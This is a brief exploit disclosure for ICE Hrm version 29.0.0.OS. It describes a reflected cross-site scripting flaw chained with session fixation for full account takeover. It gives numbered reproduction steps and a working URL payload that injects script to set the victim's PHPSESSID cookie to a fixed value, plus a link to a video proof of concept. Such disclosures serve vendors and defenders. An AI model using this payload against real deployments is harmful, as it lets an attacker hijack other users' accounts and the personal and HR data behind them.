ICE Hrm version 29.0.0.OS suffers from cross site scripting and session fixation vulnerabilities.
4f2a125bcf3c1919dd62b032560e0645fab870d5f7925db93ca9c712c8661782
# Exploit Title: ICE Hrm 29.0.0.OS - 'Account Takeover' Cross-Site Scripting and Session Fixation
# Exploit Author: *Piyush Patil *& Rafal Lykowski
# Vendor Homepage: https://icehrm.com/
# Version: 29.0.0.OS
# Tested on: Windows 10 and Kali
#Description
ICE Hrm Version 29.0.0.OS is vulnerable to session fixation and reflected cross site scripting leading to full account takeover.
#Steps to reproduce the attack:
1-Open 2 different browsers (or one with 2 windows - one of them opened in incognito mode)
2-Log in to the system,
3-Paste this payload into the address bar and load it:
http://localhost:8070/app/?g=admin&n=dashboard&m=21484%27%3bdocument.cookie=%22PHPSESSID=12345;path=/;%22%2f%2f
It simulates victim executing XSS.
4-In the incognito window do not log in but just modify session cookie value to 12345.
5-Navigate to any application url - you will realize that you are authorized. It means that your account was taken over.
#Video POC:
https://drive.google.com/file/d/1egynTGh0XsETgfu7SJtIPv1GZCs1dJ67/view?usp=sharing